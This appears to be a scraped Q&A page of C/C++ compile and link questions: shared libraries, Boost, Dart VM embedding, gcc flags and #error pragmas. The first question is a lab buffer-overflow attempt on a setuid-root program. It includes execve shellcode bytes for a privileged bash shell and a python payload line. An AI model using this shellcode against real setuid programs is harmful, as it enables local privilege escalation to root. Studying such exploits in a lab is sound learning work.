BufferOverflow shell not spawn - shell

I'm trying a buffer overflow on a simple program
#include <stdio.h>
int main(int argc, char **argv)
{
char buf[8];
gets(buf);
printf("%s\n", buf);
return 0;
}
Compiled with these options
gcc -g exploit1.c -fno-stack-protector -z execstack -o exploit1
The binaries is setuid
ls -al exploit1
-r-sr-x--- 1 root root 6016 janv. 31 01:47 exploit1
So I have disable all stack options and ASLR
My shellcode is:
\x6a\x0b\x58\x99\x52\x66\x68\x2d\x70\x89\xe1\x52\x6a\x68\x68\x2f\x62\x61\x73\x68\x2f\x62\x69\x6e\x89\xe3\x52\x51\x53\x89\xe1\xcd\x80
But no root shell appear, I have this error:
python -c 'print "A"*20 + "\xbf\xfe\xff\xbf"'| ./exploit1
-bash: ./exploit1: Permission denied
close failed in file object destructor:
sys.excepthook is missing
lost sys.stderr
Have I missed something?

You don't have permission to execute exploit1. Root needs to do:
chmod o+x exploit1

Related

Shared library not found in /usr/local/lib

Similar questions got asked a lot, but I still don't quite get what's wrong with how I compiled and installed my shared library.
As far as compiling goes I do
> gcc -c -fPIC libt.c
> gcc -shared -Wl,-soname,libt.so.0 -o libt.so.0.1 libt.o
In order to install the library I run
> cp libt.so.0.1 /usr/local/lib/
> cp libt.h /usr/local/include/
> ln -s /usr/local/lib/libt.so.0.1 /usr/local/lib/libt.so.0 # ldconfig would setup this symlink itself ...
> ln -s /usr/local/lib/libt.so.0 /usr/local/lib/libt.so # ... but not this one, so I do it myself
> sudo ldconfig
/usr/local/lib is included in /etc/ld.so.conf.d/libc.conf, and ldconfig -p | grep libt yields
libt.so.0 (libc6,x86-64) => /usr/local/lib/libt.so.0
libt.so (libc6,x86-64) => /usr/local/lib/libt.so
So, as far as I can tell, everything looks okay until this point. However, compiling a program that's supposed to use my library fails:
> gcc -o prog main.c -llibt
/usr/bin/ld: cannot find -llibt
libt.h
#ifndef libt_h__
#define libt_h__
extern int add(int, int);
#endif
libt.c
int
add(int a, int b)
{
return a + b;
}
main.c
#include <stdio.h>
#include <stdlib.h>
#include "libt.h"
void
print_usage()
{
printf("usage: ./prog <number a> <number b>\n");
}
int
main(int argc, char *argv[])
{
int a = 0, b = 0, c = 0;
if (argc != 3) {
print_usage();
return 1;
}
a = atoi(argv[1]);
b = atoi(argv[2]);
c = add(a, b);
printf("%d\n", c);
return 0;
}
Figured it out. While library names have to be prefixed with "lib", that prefix must not be specified when linking. That is, gcc -o prog main.c -llibt is wrong while gcc -o prog main.c -lt works as expected.

Dart VM embedding (libdart_jit.a) on MacOS produces "dyld: Symbol not found: __ZN4dart13FLAG_profilerE"

I am trying to make my first C++ app with embedded Dart VM. I have a problem with minimal setup of compiler on my MacOS 10.14.6. My build is successful, but when I start the app, it crashed with:
$ clang++ -I ${HOME}/opt/dart-sdk --define-macro DART_SHARED_LIB=1 -L ./libs/debug -ldart_jit -lm -lz -O2 -undefined dynamic_lookup -o reproduce *.cpp
$ ./reproduce
dyld: Symbol not found: __ZN4dart13FLAG_profilerE
Although symbol __ZN4dart13FLAG_profilerE presents inside binary
$ nm reproduce | grep __ZN4dart13FLAG_profilerE
U __ZN4dart13FLAG_profilerE
How to compile/link this properly?
My reproduce program is:
#include <iostream>
#include <include/dart_api.h>
int main(int argc, const char * argv[]) {
char* setVMFlagsError = Dart_SetVMFlags(argc, argv);
if (setVMFlagsError != nullptr) {
std::cerr << "Error while set Dart VM flags: " << setVMFlagsError << "\n";
::free(setVMFlagsError);
return 1;
} else {
Dart_InitializeParams params = {};
std::cout << "Hello, World!\n";
return 0;
}
}
Dart SDK was built following by official documentation
(dart-sdk-pyenv) ~/tmp/dart-sdk/sdk $ ./tools/build.py --mode all --arch x64 create_sdk
(dart-sdk-pyenv) ~/tmp/dart-sdk/sdk $ cp -a ~/tmp/dart-sdk/sdk/xcodebuild/DebugX64/dart-sdk ~/opt/

"Permission denied" running executable built with `-c -o`

this may sound stupid. but I only have .c file(openfile.c) and it looks like this:
#include <fcntl.h>
#include <stdio.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>
int main(int argc, char* argv[]){
char* path = argv[1];
mode_t mode = S_IRUSR | S_IWUSR | S_IRGRP | S_IWGRP | S_IROTH;
int fd = open(path, O_WRONLY | O_EXCL | O_CREAT, mode);
if(fd == -1){
perror("open");
return 1;
}
return 0;
}
and i want to write a Makefile for it.So it shouldnt be hard. The Makefile looks like this:
openfile: openfile.c
gcc -c -o openfile openfile.c
because i dont have/need a openfile.h so i just need one openfile.c. An d it compiles and when i run the ./openfile, bang, it says: bash: ./openfile: Permission denied
so wheres the problem? do i have to write a .h file?
The problem is that you don't need -c. When you pass -c to gcc it doesn't perform linking step, so you actually get o-file.

Boost/CentOS linking issue

I'm trying to learn Boost threading.
I'm using code from a tutorial online, after some errors I realised that I needed a newer version of Boost so I downloaded the latest version of it into a directory, unzipped it and installed it with the commands:
./bootstrap.sh
./bjam install
The sample code I'm trying to run is this:
#include <boost/thread.hpp>
#include <iostream>
using namespace std;
using namespace boost;
void threader()
{
for (int i = 0; i < 5; ++i)
{
sleep(1);
cout << boost::this_thread::get_id() << "-" << i << endl;
//cout << "-" << i << endl;
}
}
int main()
{
thread t(threader);
sleep(1);
thread u(threader);
t.join();
u.join();
}
I compiled with the same line I used with the old version of Boost(1.33 as comes with Centos as standard):
g++ -Wall -L/usr/local/lib -lboost_thread threadtest.cpp -o threadtest
It compiled without error (unlike with the old version of Boost) but when I run threadtest I get:
./threadtest: error while loading shared libraries: libboost_thread.so.1.47.0: cannot open shared object file: No such file or directory
Looking into the /usr/local/lib dircetory I can see the following:
-rw-r--r-- 1 root root 217270 Nov 10 12:50 libboost_thread.a
lrwxrwxrwx 1 root root 25 Nov 10 12:43 libboost_thread.so -> libboost_thread.so.1.47.0
-rwxr-xr-x 1 root root 138719 Nov 10 12:43 libboost_thread.so.1.47.0
So I cannot see why it's not working.
I think it's to do with the -lboost_thread part of the compilation line.
I tried linking to the library directly with:
g++ -Wall -L/usr/local/lib libboost_thread.a threadtest.cpp -o threadtest
But it again can't find the file.
Can anyone help with this?
I needed to re-add the path of my lib directory to my LD_LIBRARY_PATH with the following:
export LD_LIBRARY_PATH="/usr/local/lib/"
That did the trick.

GCC #pragma to stop compilation

Is there a GCC pragma directive that will stop, halt, or abort the compilation process?
I am using GCC 4.1, but I would want the pragma to be available in GCC 3.x versions also.
You probably want #error:
$ cd /tmp
$ g++ -Wall -DGoOn -o stopthis stopthis.cpp
$ ./stopthis
Hello, world
$ g++ -Wall -o stopthis stopthis.cpp
stopthis.cpp:7:6: error: #error I had enough
File stopthis.cpp
#include <iostream>
int main(void) {
std::cout << "Hello, world\n";
#ifndef GoOn
#error I had enough
#endif
return 0;
}
I do not know about a #pragma, but #error should do what you want:
#error Failing compilation
It will terminate compilation with the error message "Failing compilation".
This works:
#include <stophere>
GCC stops when it can't find the include file. I wanted GCC to stop if C++14 was not supported.
#if __cplusplus<201300L
#error need g++14
#include <stophere>
#endif
While typically #error is sufficient (and portable), there are times when you want to use a pragma, namely, when you want to optionally cause an error within a macro.
Here is an example use which depends on C11's _Generic and _Pragma.
This example ensures var isn't an int * or a short *, but not a const int * at compile time.
Example:
#define MACRO(var) do { \
(void)_Generic(var, \
int *: 0, \
short *: 0, \
const int *: 0 _Pragma("GCC error \"const not allowed\"")); \
\
MACRO_BODY(var); \
} while (0)
#pragma GCC error "error message"
Ref: 7 Pragmas
You can use:
#pragma GCC error "my message"
But it is not standard.
An alternative is to use static_assert:
#if defined(_MSC_VER) && _MSC_VER < 1916
static_assert(false, "MSVC supported versions are 1916 and later");
#endif

Resources